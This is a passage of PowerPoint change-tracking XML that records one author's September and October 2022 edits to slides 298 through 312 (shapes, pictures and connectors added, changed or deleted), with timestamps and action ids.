          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:03:52.773" v="4112" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3974513580" sldId="298"/>
            <ac:cxnSpMk id="2074" creationId="{F181D55F-95D0-0AFD-B0BE-17AFB5D8869D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561966559" sldId="299"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:08:43.039" v="4760" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2588900546" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:04:09.933" v="4120" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588900546" sldId="29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08:43.039" v="4760" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588900546" sldId="299"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:06:04.594" v="4356" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2588900546" sldId="299"/>
            <ac:cxnSpMk id="5" creationId="{BF6DE930-16C8-A185-3B37-02287E9A6326}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:13:33.118" v="5180" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1147678590" sldId="300"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:13:33.118" v="5180" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1147678590" sldId="300"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:09:27.114" v="4773" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1147678590" sldId="300"/>
            <ac:cxnSpMk id="5" creationId="{BF6DE930-16C8-A185-3B37-02287E9A6326}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg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2875989526" sldId="300"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-05T22:47:27.940" v="122" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="126392258" sldId="301"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:15:59.907" v="5478" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="380065685" sldId="301"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:15:59.907" v="5478" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="380065685" sldId="301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03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:16:57.889" v="5483" actId="1440"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3174773230" sldId="302"/>
        </pc:sldMkLst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" creationId="{AD37334B-7304-5670-2D80-B79C85B420C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6" creationId="{6760FBEB-4853-0870-B28C-64D27C0DEC0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9" creationId="{E5D5D0A2-62E3-0246-5257-2231E519F85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3" creationId="{DA7D0443-33D1-AC24-69E0-084FFC577B0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17" creationId="{D1A84DCE-8297-53D1-0C6E-B102E8166CA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2" creationId="{5A483EE5-9590-8CA6-B7CF-1B9A07FCECF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6" creationId="{F4C78CAC-70AC-A4FB-E608-BE85E55E3459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9" creationId="{880D8C06-00C9-343D-AF36-25E9CC0A5BDD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3" creationId="{3E665920-5017-5485-FD62-08FEAD887D5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37" creationId="{4888D339-2CFD-2F65-86F7-423E9CCA7918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1" creationId="{68ABE50E-DF72-9FF3-86FC-A30A8C557987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4" creationId="{C3BB8772-66BB-26AA-AB0C-C26FAF49209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7" creationId="{0B7CA00D-9211-97CD-4CEC-804E0C1E528B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49" creationId="{16CD9264-EEBE-CE8F-A3F6-A3303414E92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3" creationId="{CD4D0548-E0BF-C222-BCCD-52A2ACE431AE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5" creationId="{0FEC8946-88C6-1293-069E-0065CBC53455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7" creationId="{C756FCE6-E95D-8A1E-F163-BB9100EDB4B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59" creationId="{404585EE-3333-A770-549C-5BD66AF64C02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0" creationId="{F647F06D-CA3F-59FB-7E23-49E13E593366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52" creationId="{7613292D-1D61-B2B5-865F-EE8111341A8F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2" creationId="{F353755C-D0EB-DD61-9C72-5CB6816C4A1A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64" creationId="{75F9EC46-5A02-80E8-F050-833D4ED24A23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1" creationId="{612D2035-2139-5BD2-5DB6-CC99CD7E0CD0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:16:35.248" v="5481" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3174773230" sldId="302"/>
            <ac:spMk id="2073" creationId="{E39817BF-0EAD-F9DB-2AF3-3ADC761FA010}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:16:57.889" v="5483" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3174773230" sldId="302"/>
            <ac:picMk id="6146" creationId="{721A5180-C9A1-70C3-64B3-F62BEC0CEE48}"/>
          </ac:picMkLst>
        </pc:pic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60" creationId="{67093A96-33C3-7539-FE77-8518861F8B03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53" creationId="{36E4A375-7B41-2CCB-9042-74EC85162B66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67" creationId="{2C4444D1-8C9E-4940-80CB-91E737DEEC54}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:16:35.248" v="5481" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3174773230" sldId="302"/>
            <ac:cxnSpMk id="2074" creationId="{F181D55F-95D0-0AFD-B0BE-17AFB5D8869D}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:39.646" v="5522" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2128498135" sldId="303"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:39.646" v="5522" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303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17:17.135" v="5485" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="6" creationId="{6760FBEB-4853-0870-B28C-64D27C0DEC09}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:19.949" v="5486" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="17" creationId="{D1A84DCE-8297-53D1-0C6E-B102E8166CAA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:22.862" v="5487" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="26" creationId="{F4C78CAC-70AC-A4FB-E608-BE85E55E3459}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:24.943" v="5488" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="33" creationId="{3E665920-5017-5485-FD62-08FEAD887D52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41" creationId="{68ABE50E-DF72-9FF3-86FC-A30A8C557987}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:12.853" v="5504" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="47" creationId="{0B7CA00D-9211-97CD-4CEC-804E0C1E528B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3" creationId="{CD4D0548-E0BF-C222-BCCD-52A2ACE431AE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:19.412" v="5505" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="57" creationId="{C756FCE6-E95D-8A1E-F163-BB9100EDB4B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:10.292" v="5503" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="2052" creationId="{7613292D-1D61-B2B5-865F-EE8111341A8F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:23.795" v="5506" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="2064" creationId="{75F9EC46-5A02-80E8-F050-833D4ED24A23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:18:08.436" v="5502" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:spMk id="2073" creationId="{E39817BF-0EAD-F9DB-2AF3-3ADC761FA010}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:59.827" v="5501" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:cxnSpMk id="7" creationId="{111DD13C-E414-7A3C-E5B9-A45DEE0B2559}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:58.925" v="5500" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:cxnSpMk id="8" creationId="{2A718A3C-CA88-98DC-5EAC-C2059ACBCFDC}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add del mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:17:57.959" v="5499" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2128498135" sldId="303"/>
            <ac:cxnSpMk id="11" creationId="{38AE9792-7A08-5B25-E823-90B4E41C955F}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:46:06.852" v="7700" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="130392356" sldId="304"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:19:43.273" v="5560" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="130392356" sldId="304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46:06.852" v="7700" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="130392356" sldId="304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20:09.570" v="5646" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="130392356" sldId="304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29:52.532" v="5928" actId="167"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="678245409" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:27:15.078" v="5737" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="678245409" sldId="305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29:47.943" v="5927" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="678245409" sldId="305"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:27:48.219" v="5741" actId="167"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="678245409" sldId="305"/>
            <ac:spMk id="5" creationId="{4981BC6A-4F73-8F7E-0BFD-5659C0856834}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="ord">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:29:52.532" v="5928" actId="167"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="678245409" sldId="305"/>
            <ac:picMk id="24" creationId="{AEF942E7-0B62-B105-D39A-BEC25F11B6C3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:27:16.645" v="5738" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="678245409" sldId="305"/>
            <ac:picMk id="3074" creationId="{977D48FA-A0A8-1F38-4507-F97578A4B00A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:27:07.383" v="5722"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3715728751" sldId="305"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:32:33.853" v="6342"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="862356587" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:30:24.435" v="5964" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="862356587" sldId="306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2:33.853" v="6342"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="862356587" sldId="306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36:39.491" v="6794" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2298956982" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:35:36.391" v="6666" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2298956982" sldId="307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6:39.491" v="6794" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2298956982" sldId="307"/>
            <ac:spMk id="3" creationId="{981CA61E-6F5E-88CD-CBC2-3C5887EBF30C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:36:37.395" v="6793" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2298956982" sldId="307"/>
            <ac:spMk id="5" creationId="{4981BC6A-4F73-8F7E-0BFD-5659C0856834}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:38:52.373" v="7101" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1161922861" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:37:15.648" v="6826" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1161922861" sldId="308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38:52.373" v="7101" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1161922861" sldId="308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4:19.502" v="7515" actId="114"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2781138118" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:40:34.696" v="7190" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2781138118" sldId="309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4:19.502" v="7515" actId="114"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2781138118" sldId="309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03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:45:36.365" v="7698" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="66007121" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:43:19.640" v="7434" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66007121" sldId="310"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:45:36.365" v="7698" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="66007121" sldId="310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03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:50:01.118" v="7727"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2786510126" sldId="311"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:53:28.810" v="7866" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3418671525" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:50:20.391" v="7761" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3418671525" sldId="311"/>
            <ac:spMk id="4" creationId="{0C9609F8-F29B-B7B4-D48D-3D146F22750B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:50:10.453" v="7730" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3418671525" sldId="311"/>
            <ac:spMk id="6" creationId="{021DB960-2713-C71C-53BF-43DC1D9718AC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:53:28.810" v="7866" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3418671525" sldId="311"/>
            <ac:spMk id="8" creationId="{9D4B3052-5260-DCF3-1582-98BFB20C42E6}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:56:44.899" v="7928" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1316747116" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:54:19.006" v="7914" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:spMk id="2" creationId="{BB5CBB3F-8B5B-1337-5D71-2E5EA523328D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:54:35.082" v="7917"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:spMk id="3" creationId="{0E5680EE-EA24-FE9F-BCD8-D93A9855E4E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:56:00.676" v="7922"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:spMk id="5" creationId="{58ABFAB4-2857-ED83-E4F4-5E7FB1244945}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:54:33.441" v="7915" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:picMk id="6146" creationId="{721A5180-C9A1-70C3-64B3-F62BEC0CEE48}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:56:44.899" v="7928" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:picMk id="11268" creationId="{4FEB82E0-B3DE-69E9-BD38-867BD4C3456C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Corentin Badot-Bertrand" userId="0d1cdbd82cf1530b" providerId="LiveId" clId="{03663E54-95CF-4384-B1BF-F96AFC588663}" dt="2022-09-07T09:56:10.772" v="7924"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1316747116" sldId="312"/>
            <ac:picMk id="11272" creationId="{E6EF964B-6969-039A-614A-F7E9066E6E81}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:22:14.072" v="478" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Corentin BADOT-BERTRAND" userId="27662e5d-0d19-4791-8099-d9c7e813972c" providerId="ADAL" clId="{F626B822-A789-45CC-8C80-93E5BAD15F7D}" dt="2022-10-16T21:06:27.794" v="55" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
